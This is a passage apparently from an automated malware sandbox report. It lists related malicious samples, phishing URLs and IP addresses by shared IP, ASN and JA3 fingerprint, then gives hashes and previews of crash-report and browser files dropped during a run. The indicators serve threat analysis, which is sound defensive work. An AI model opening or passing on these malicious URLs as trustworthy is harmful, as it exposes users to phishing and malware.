                                                                                                                                      jdruBkJUZi.exeGet hashmaliciousBrowse
                                                                                                                                      • 54.221.234.156
                                                                                                                                      jdruBkJUZi.exeGet hashmaliciousBrowse
                                                                                                                                      • 23.21.153.210
                                                                                                                                      jdruBkJUZi.exeGet hashmaliciousBrowse
                                                                                                                                      • 54.225.191.113
                                                                                                                                      https://extranettoulouse.creatorlink.net/Get hashmaliciousBrowse
                                                                                                                                      • 107.22.251.25
                                                                                                                                      Swift reciept.exeGet hashmaliciousBrowse
                                                                                                                                      • 54.225.66.103
                                                                                                                                      XiIz4Xklvc.exeGet hashmaliciousBrowse
                                                                                                                                      • 184.73.165.106
                                                                                                                                      https://www.notism.io/-/07ace71cc299025c9a5905bb5Get hashmaliciousBrowse
                                                                                                                                      • 54.225.66.103
                                                                                                                                      G92gUs1DwA.exeGet hashmaliciousBrowse
                                                                                                                                      • 107.22.188.116
                                                                                                                                      8V8p4Yq5Vo.zipGet hashmaliciousBrowse
                                                                                                                                      • 174.129.214.20
                                                                                                                                      0wligr5b.wlo.exeGet hashmaliciousBrowse
                                                                                                                                      • 54.243.162.249
                                                                                                                                      0wligr5b.wlo.exeGet hashmaliciousBrowse
                                                                                                                                      • 184.73.165.106
                                                                                                                                      0wligr5b.wlo.exeGet hashmaliciousBrowse
                                                                                                                                      • 107.22.251.25
                                                                                                                                      0wligr5b.wlo.exeGet hashmaliciousBrowse
                                                                                                                                      • 204.236.231.159
                                                                                                                                      0wligr5b.wlo.exeGet hashmaliciousBrowse
                                                                                                                                      • 23.21.153.210
                                                                                                                                      0wligr5b.wlo.exeGet hashmaliciousBrowse
                                                                                                                                      • 23.21.153.210
                                                                                                                                      RFQ12OK_pdf.exeGet hashmaliciousBrowse
                                                                                                                                      • 54.243.162.249
                                                                                                                                      AMG-017-PR-2020.exeGet hashmaliciousBrowse
                                                                                                                                      • 54.225.182.172
                                                                                                                                      https://api.ipify.org/?format=jsonp&callback=jQuery11120609716424699766_1591636053741&_=1591636053742Get hashmaliciousBrowse
                                                                                                                                      • 54.225.178.192

                                                                                                                                      ASN

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                      AS-HOSTINGERLThttp://wingfitech.com/images/scotia/redirect.htmlGet hashmaliciousBrowse
                                                                                                                                      • 194.59.164.65
                                                                                                                                      setup.exeGet hashmaliciousBrowse
                                                                                                                                      • 141.136.36.13
                                                                                                                                      SELECTELRUInvoice_810676_Inc.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 84.38.183.228
                                                                                                                                      Office 365 32802.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 84.38.183.228
                                                                                                                                      http://95.213.165.45Get hashmaliciousBrowse
                                                                                                                                      • 95.213.165.45
                                                                                                                                      Channa_Reba.xlsGet hashmaliciousBrowse
                                                                                                                                      • 31.184.253.146
                                                                                                                                      87856575-55.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 84.38.183.114
                                                                                                                                      87856575-55.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 84.38.183.114
                                                                                                                                      54012904-31.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 84.38.183.114
                                                                                                                                      #RFQ ANN36151207.xlsxGet hashmaliciousBrowse
                                                                                                                                      • 84.38.183.37
                                                                                                                                      AWB191598404745.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 84.38.183.114
                                                                                                                                      http://nabudore.top/jojo684/39f744.phpGet hashmaliciousBrowse
                                                                                                                                      • 84.38.181.209
                                                                                                                                      AWB 770568604827.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 84.38.183.237
                                                                                                                                      favicon.dllGet hashmaliciousBrowse
                                                                                                                                      • 31.184.253.171
                                                                                                                                      INV_4540_80467.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 188.68.221.14
                                                                                                                                      PAY700593006193318.docGet hashmaliciousBrowse
                                                                                                                                      • 91.217.9.187
                                                                                                                                      PAY700593006193318.docGet hashmaliciousBrowse
                                                                                                                                      • 91.217.9.187
                                                                                                                                      C_ACH_02042019.xlsmGet hashmaliciousBrowse
                                                                                                                                      • 80.93.177.126
                                                                                                                                      http://svai-nkt.ru/En/corporation/Invoice_number/jQxe-VGfy_PVswUKb-ZLxGet hashmaliciousBrowse
                                                                                                                                      • 91.217.9.187
                                                                                                                                      Payment_Doc_5136168.docGet hashmaliciousBrowse
                                                                                                                                      • 80.93.177.126
                                                                                                                                      http://87.117.235.116Get hashmaliciousBrowse
                                                                                                                                      • 95.213.215.205
                                                                                                                                      mswvc.exeGet hashmaliciousBrowse
                                                                                                                                      • 82.202.212.162
                                                                                                                                      CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdChttp://k2scz.info/EZjs5k30wxGet hashmaliciousBrowse
                                                                                                                                      • 8.210.166.202
                                                                                                                                      http://tipsandtricks.specialtopics.website/key/ypxqlaGet hashmaliciousBrowse
                                                                                                                                      • 8.208.23.225
                                                                                                                                      http://www.tuckerdefense.comGet hashmaliciousBrowse
                                                                                                                                      • 198.11.136.82
                                                                                                                                      http://look.healthcaretopic.club/flm/epv7Get hashmaliciousBrowse
                                                                                                                                      • 8.208.23.225
                                                                                                                                      https://www.superbirkin.com/wp-content/plugins/uhnwseo/remittance.jarGet hashmaliciousBrowse
                                                                                                                                      • 161.117.3.122
                                                                                                                                      Payment.135.xlsGet hashmaliciousBrowse
                                                                                                                                      • 47.57.165.162
                                                                                                                                      Payment.135.xlsGet hashmaliciousBrowse
                                                                                                                                      • 47.57.165.162
                                                                                                                                      https://smipsdarnay.com/394-20200707-10-DELAW.jarGet hashmaliciousBrowse
                                                                                                                                      • 47.91.114.92
                                                                                                                                      order59.xlsGet hashmaliciousBrowse
                                                                                                                                      • 47.57.165.162
                                                                                                                                      order59.xlsGet hashmaliciousBrowse
                                                                                                                                      • 47.57.165.162
                                                                                                                                      https://delawhub.com/Get hashmaliciousBrowse
                                                                                                                                      • 47.91.114.92
                                                                                                                                      look_presentation#_94875.vbsGet hashmaliciousBrowse
                                                                                                                                      • 8.208.80.226
                                                                                                                                      in910.xlsGet hashmaliciousBrowse
                                                                                                                                      • 47.57.165.162
                                                                                                                                      Qt.961.xlsGet hashmaliciousBrowse
                                                                                                                                      • 47.57.165.162
                                                                                                                                      Qt.961.xlsGet hashmaliciousBrowse
                                                                                                                                      • 47.57.165.162
                                                                                                                                      order.652.xlsGet hashmaliciousBrowse
                                                                                                                                      • 47.57.165.162
                                                                                                                                      order.652.xlsGet hashmaliciousBrowse
                                                                                                                                      • 47.57.165.162
                                                                                                                                      presentation#_48406.vbsGet hashmaliciousBrowse
                                                                                                                                      • 8.210.127.177
                                                                                                                                      presentation#_48406.vbsGet hashmaliciousBrowse
                                                                                                                                      • 8.210.127.177
                                                                                                                                      664385.xlsGet hashmaliciousBrowse
                                                                                                                                      • 47.254.124.187
                                                                                                                                      AMAZON-AESUShttp://securemsg.bankofamerica.com/pe.htmlGet hashmaliciousBrowse
                                                                                                                                      • 52.86.34.117
                                                                                                                                      33#U0443.exeGet hashmaliciousBrowse
                                                                                                                                      • 35.172.94.1
                                                                                                                                      http://rebrand.ly/y41stxiGet hashmaliciousBrowse
                                                                                                                                      • 3.214.100.252
                                                                                                                                      http://bit.do/fGuK9Get hashmaliciousBrowse
                                                                                                                                      • 54.83.52.76
                                                                                                                                      BLUNT1040RET18.docGet hashmaliciousBrowse
                                                                                                                                      • 52.55.47.113
                                                                                                                                      https://www.dropbox.com/l/AAA89lBj6MiBhOeQQ6Lru61-FzuMJlwCLCYGet hashmaliciousBrowse
                                                                                                                                      • 34.234.126.38
                                                                                                                                      http://bit.do/fGyE2Get hashmaliciousBrowse
                                                                                                                                      • 54.83.52.76
                                                                                                                                      https://bootsonagmvhhy.storage.googleapis.com/bootsizitvhjeo.html#qs=r-abacaecgjgkeacaefbicababacagbacfcaccakjbackbfahebejacbGet hashmaliciousBrowse
                                                                                                                                      • 54.164.243.243
                                                                                                                                      19 extension.docGet hashmaliciousBrowse
                                                                                                                                      • 52.207.6.131
                                                                                                                                      http://www.tuckerdefense.comGet hashmaliciousBrowse
                                                                                                                                      • 34.194.120.148
                                                                                                                                      https://61a5aa08df524631b9d45ec6593f6d8a.svc.dynamics.com/t/r/glCS8jZ5Wwi19P7HTuz0GDRKU_8MAPkSd3XMmUyIAx0#jerrym@dwotc.com:dY9R89300-2383474993878ud=388cKp0FyZm_xcLaGa5Gig947783+trackid3cKp0FyZm_xcLaGa5Gig893Get hashmaliciousBrowse
                                                                                                                                      • 184.73.212.164
                                                                                                                                      58afNmgh8T.exeGet hashmaliciousBrowse
                                                                                                                                      • 174.129.214.20
                                                                                                                                      58afNmgh8T.exeGet hashmaliciousBrowse
                                                                                                                                      • 107.22.251.25
                                                                                                                                      http://wyoutube.comGet hashmaliciousBrowse
                                                                                                                                      • 54.235.212.68
                                                                                                                                      http://email.extrahoteldeals.com/c/eJwdj8FuwyAQRL_GHNF6CTF74JC47W9UawwyKQku0NT5-6JKoxnpnd6s1qDXIKJFQIAJCAwYJDnKy7sxM15hVhPB-IbDCfzRCm-5-bR6TlW6fBebBWAcYdEEEJbFKFwcEyAHZfT5pEDcLWpNZ00i2a21vQ7qMuBHD4cQU-TmJbuSa5WxdfrEXi5F99X3hvvxg4_wooNI_96m76colh9r8Sw35uq7GB97_rdpdi6vveXPfmRC-ANtxELEGet hashmaliciousBrowse
                                                                                                                                      • 54.157.235.0
                                                                                                                                      newageGet hashmaliciousBrowse
                                                                                                                                      • 44.218.149.149
                                                                                                                                      Mrm6c2mSIS.apkGet hashmaliciousBrowse
                                                                                                                                      • 54.164.41.106
                                                                                                                                      http://www.timesindonesia.co.idGet hashmaliciousBrowse
                                                                                                                                      • 54.86.112.34
                                                                                                                                      http://crimoaogameizox.frb.io/Get hashmaliciousBrowse
                                                                                                                                      • 3.91.190.61
                                                                                                                                      EDVqSO7OAuGet hashmaliciousBrowse
                                                                                                                                      • 54.164.41.106

                                                                                                                                      JA3 Fingerprints

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                      37f463bf4616ecd445d4a1937da06e19https://email-web-server.tk/excelsheet/puchaseinquiry/VPexcel//index.php?login=ian.smith@cybg.comGet hashmaliciousBrowse
                                                                                                                                      • 185.206.163.136
                                                                                                                                      http://securemsg.bankofamerica.com/pe.htmlGet hashmaliciousBrowse
                                                                                                                                      • 185.206.163.136
                                                                                                                                      https://contabilidaddecostes.com/todwll/?email=cynthia.hng@vodafone.comGet hashmaliciousBrowse
                                                                                                                                      • 185.206.163.136
                                                                                                                                      https://www.flipsnack.com/templateportal/remittance/full-view.htmlGet hashmaliciousBrowse
                                                                                                                                      • 185.206.163.136
                                                                                                                                      http://kitetechgroup.uwu.aiGet hashmaliciousBrowse
                                                                                                                                      • 185.206.163.136
                                                                                                                                      https://1drv.ms/u/s!Ai3YLFZQP4zmg1UgwXLhp52B5osP?e=r9vrUKGet hashmaliciousBrowse
                                                                                                                                      • 185.206.163.136
                                                                                                                                      https://thebestweightloss.world/us/blood_balance?bhu=bHDYKR7BTANx1TQZ3jNWQQ1y8rnPpoZ4CCGet hashmaliciousBrowse
                                                                                                                                      • 185.206.163.136
                                                                                                                                      W_Origina.vbsGet hashmaliciousBrowse
                                                                                                                                      • 185.206.163.136
                                                                                                                                      #U260e#Ufe0f#Ud83d#UdcdeLindy#37109713.HTMGet hashmaliciousBrowse
                                                                                                                                      • 185.206.163.136
                                                                                                                                      https://mokeekel-app.tk/jldknd/kdlkd/Archive/cymkGet hashmaliciousBrowse
                                                                                                                                      • 185.206.163.136
                                                                                                                                      %E2%98%8E%EF%B8%8F%F0%9F%93%9EKjordan.wav%20#25213212.HTMGet hashmaliciousBrowse
                                                                                                                                      • 185.206.163.136
                                                                                                                                      https://u17341650.ct.sendgrid.net/ls/click?upn=zvKNZd4k-2BkBglnb6p24q-2FKkVhkg12b-2BQgcM9zIQbf7AUSEMDTK-2FLUcMtKMYhdtkOx2zNl9rGwMqHcI07x3oD7A-3D-3DpDak_arMtbJFDoVSLIyX3DVqz9fHjvGj4JL1q2eHUNnXdZXre6IDukTH3LiuIw8FaTwc4nxyeXk7pO3vuOaIMHGRJYocVovw6gyb4a6WYjaylZh-2Bcc751IkdCcTdm4o8hRQjTLDxFQSHPVAGU1zeANYbYMmK6YnzsYgvHiPMDB7We23WhYZ5nOyX0cC42PnsPEtv5gB068-2Be3jXV-2FDLeSN9mlg-2FrXA63ADzL4h1uTuuw3qSJxwVx9O-2BSC9pMngjZCvTdRGet hashmaliciousBrowse
                                                                                                                                      • 185.206.163.136
                                                                                                                                      https://surl.me/117kGet hashmaliciousBrowse
                                                                                                                                      • 185.206.163.136
                                                                                                                                      https://mkbodyrepairs.co.uk/document-2020.htmlGet hashmaliciousBrowse
                                                                                                                                      • 185.206.163.136
                                                                                                                                      ATT82131.HTMGet hashmaliciousBrowse
                                                                                                                                      • 185.206.163.136
                                                                                                                                      Voice 004 .hTmGet hashmaliciousBrowse
                                                                                                                                      • 185.206.163.136
                                                                                                                                      #U260e#Ufe0f#Ud83d#UdcdeNaomi.wav #91372613.HTMGet hashmaliciousBrowse
                                                                                                                                      • 185.206.163.136
                                                                                                                                      Voice 004 .hTmGet hashmaliciousBrowse
                                                                                                                                      • 185.206.163.136
                                                                                                                                      http://castordiary.com/ehomeGet hashmaliciousBrowse
                                                                                                                                      • 185.206.163.136
                                                                                                                                      http://pioneerfitting.com/http/asok.exeGet hashmaliciousBrowse
                                                                                                                                      • 185.206.163.136

                                                                                                                                      Dropped Files

                                                                                                                                      No context

                                                                                                                                      Created / dropped Files

                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_47d3cca66b7677c2576542e98787a2eddb86d_7a325c51_02a47bf4\Report.wer
                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                      Size (bytes):11468
                                                                                                                                      Entropy (8bit):3.7725105294543613
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:D02450764557F842F1779A6DCE8352B3
                                                                                                                                      SHA1:2C152F6CF5E28C73E083D048808AC31FB1A45CB1
                                                                                                                                      SHA-256:E623B0BBD1D720EBADB4B3310CE8E3141491DCF498154B05EE24B4813C53AA6C
                                                                                                                                      SHA-512:964A2B6AD997FD6B0DC0486F95BAFAD14E756EB16F4C8B22C1FF77F5A01C066E2C5A4E4A4171FD2EC24CA90EB3A4A86A4E664E6164AFB2C4505B39DC00CBF921
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.3.9.1.9.2.0.4.4.9.3.4.8.1.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.6.1.1.b.5.3.7.-.b.3.5.8.-.4.8.0.2.-.a.a.0.2.-.7.e.3.b.a.a.9.b.4.7.0.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.8.9.5.b.2.9.-.9.4.4.3.-.4.e.6.7.-.b.d.6.5.-.4.a.5.a.c.4.d.b.f.1.2.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.e.g.s.v.r.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.E.G.S.V.R.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.3.0.-.0.0.0.1.-.0.0.2.2.-.3.f.a.d.-.3.6.0.2.c.0.5.9.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.6.3.0.f.6.0.e.7.3.4.5.4.6.7.0.a.7.d.9.b.6.4.c.9.8.b.4.7.9.8.d.1.d.e.8.8.7.2.!.r.e.g.s.v.r.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.1././.0.4././.0.9.:.1.7.:.2.8.:.2.3.
                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER6A03.tmp.dmp
                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Tue Jul 14 09:20:46 2020, 0x1205a4 type
                                                                                                                                      Size (bytes):46890
                                                                                                                                      Entropy (8bit):2.224196287060662
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:ED62F6AF52E6DAEE2F855DB8F62270B6
                                                                                                                                      SHA1:C9F6F5C438B9F3AD421C0BA183CDBFCE7C251A76
                                                                                                                                      SHA-256:A881AC88B55CEBC27D2E1D559F38E16331B1EE49A61E2E04221C29BAC16570E3
                                                                                                                                      SHA-512:0DBE5842A2A0B65034E317EBC8330F8CEDC120DA931C89E330C6D01ED7A96EA026CCF050A763C57F37D03649757185BEBC01A61C11AFE282CB405DEC63289DE5
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: MDMP....... ........x._...................?...........B..............GenuineIntel............T.......0....x._........`...`...`............0..=...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER728F.tmp.WERInternalMetadata.xml
                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                      Size (bytes):8282
                                                                                                                                      Entropy (8bit):3.6945505321229093
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:AAC9A3A4BAE19621C3A93B7C120E6191
                                                                                                                                      SHA1:B2F0BDDC4F7E01C9C266025E9056BFA9C5021DAC
                                                                                                                                      SHA-256:F878233D93B7121F10F2DA8A0D06FE7C28CD89EED9A6E21F777C73E986637C65
                                                                                                                                      SHA-512:CC4562A56F57F22442C60865663721B73FD4E33411CD70B83E6BEDADC4D96350FC2F68844C9E8469E3542DE01EBE82C370AE5041CD4D51F888E68CBA6717CA38
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1.6.5...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.1.2.<./.P.i.d.
                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER754F.tmp.xml
                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                      Size (bytes):4580
                                                                                                                                      Entropy (8bit):4.454707659708491
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:6B9B7718D4E89C70E6E750AEEA917F5A
                                                                                                                                      SHA1:A7930AF9995DD7998F04AA7DAC106E482E2D478C
                                                                                                                                      SHA-256:4B0327B672F33CA79725CDFADFD517AFF5819FDBA48D4E4B4294644C9DA1244D
                                                                                                                                      SHA-512:411A1AA8BC6C63FC09B72911D085B46A99ECE838B99873E3B39A104A8501BC23F133FECFBA8C520AB9A9A2ACAD42D57C94EC49F4B0411A2C6C534267118F2012
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="165" />.. <arg nm="verqfe" val="165" />.. <arg nm="csdbld" val="165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1055537" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.165.17134.0-11.0.75" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="2048" /
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5D34F2B4-C5B3-11EA-AAE4-C2DD1F0DAA95}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Size (bytes):29272
                                                                                                                                      Entropy (8bit):1.7736014006042586
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:5882C228F69C0E3A640099AD0B5FADDF
                                                                                                                                      SHA1:3CD821481936CC08D8C72282A46D53739EE8D770
                                                                                                                                      SHA-256:15FDA38496639879F7BE3F22840D21F7268B4A0F838CCF6E04924304F22C078A
                                                                                                                                      SHA-512:56220F8FDCD116C145903EF5781D0AA0F47221253891494C561FB0F4FC42875EE70E9A53F5BF99CA50C7AB7BC04A4D93044C3FB6EFD1FACE7E6434B38BEADF85
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{79DD1811-C5B3-11EA-AAE4-C2DD1F0DAA95}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Size (bytes):29272
                                                                                                                                      Entropy (8bit):1.7658380358999521
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:2BDDB9F4548C89A4FB32C33FAC351E1A
                                                                                                                                      SHA1:DAACC60B608E4E569F973019E7DBBE5760CC063C
                                                                                                                                      SHA-256:E8F550CD93405FC643D9AC11663B1A621544BC4F67B61A9F0F5991A8ED71BEC2
                                                                                                                                      SHA-512:62AD7FAEF2528CB6035B10F83A1AD1B5BC5DE4E205717EE4F75176607DFC24127BD449F576D8707BC3F57AF729DE31FB2B39CD578132195123BBFD6A707AE371
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5D34F2B6-C5B3-11EA-AAE4-C2DD1F0DAA95}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Size (bytes):28120
                                                                                                                                      Entropy (8bit):1.9101130513941005
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:14F2C29F304421FA3F7A5FA44A585C80
                                                                                                                                      SHA1:7382E00CACFEF8D853B7415B442EF4FCBDE9EC29
                                                                                                                                      SHA-256:79B0B4C45689589F26E60C8CEF9DA06C2DBD9CA72C235BFEE91D98F4D0791C3B
                                                                                                                                      SHA-512:EEC40F5FBAF80DA799C55088C5A009FF675E41AAB82308E4AE0B671E8AC24B736C40185EE66F0F3715A7BB01154FA4F5317C86A287EE61D87E1B4798C8CDF94F
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{79DD1813-C5B3-11EA-AAE4-C2DD1F0DAA95}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Size (bytes):28120
                                                                                                                                      Entropy (8bit):1.9088155571000063
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:F9ACF5241FDA37B1751C82F913AE774E
                                                                                                                                      SHA1:C9733F3551035666AA8EB67E976CC9BBD33FF1A8
                                                                                                                                      SHA-256:B2B32AAF89619EEF2F763D8DA023D1E4295C49F3B1EB012FA2A57669895BD9A9
                                                                                                                                      SHA-512:5EFD6D7E5FFF8A7410F2A947E66D7A56FE9490A3CB6749E13156F107D0C2886423E88321F5B10FF69D9353BCB65CD467ECFD88B0677A4DD054DAA8A43E75891B
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):655
                                                                                                                                      Entropy (8bit):5.058843118064778
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:85C0F4466155B5FB3DCA6DA47573BD56
                                                                                                                                      SHA1:DA240E516B0C4C890206EB878916CEDF8147660A
                                                                                                                                      SHA-256:04E6FD05B2D3607CC9946569E48E11455523F7ECD2D1F566AB0882E1A0CCD7DB
                                                                                                                                      SHA-512:FCB1B771F18543B6B43CA740AD38E33FF1A5DC502C8826C6C7A46DFDAA48ECC81AC73BCCC77E0B26A90072E736A21A18F167742D30AF8786A6E5FD8800B8B3BE
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x353eafea,0x01d659c0</date><accdate>0x353eafea,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x353eafea,0x01d659c0</date><accdate>0x353eafea,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):652
                                                                                                                                      Entropy (8bit):5.1164003676913445
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:D1895BCDE1E9E97A00400AA885C9E93A
                                                                                                                                      SHA1:09A4C26963584FEA0A515BC0979F9239C12BB714
                                                                                                                                      SHA-256:63CD35E0730EA60D18259C8B8D525D6F1509219546D85DD3C9B0B8B60DD8E1C2
                                                                                                                                      SHA-512:758BAA0026A34DDA017BC57C385E46CEBD1F7BD7A4825D6827F4A131951AAC0B26A40DAF41B1C13BA5CFA49D1DBD024F587E4F5F20E5AAA3B56C8FD12AA8CCCD
                                                                                                                                      Malicious:false
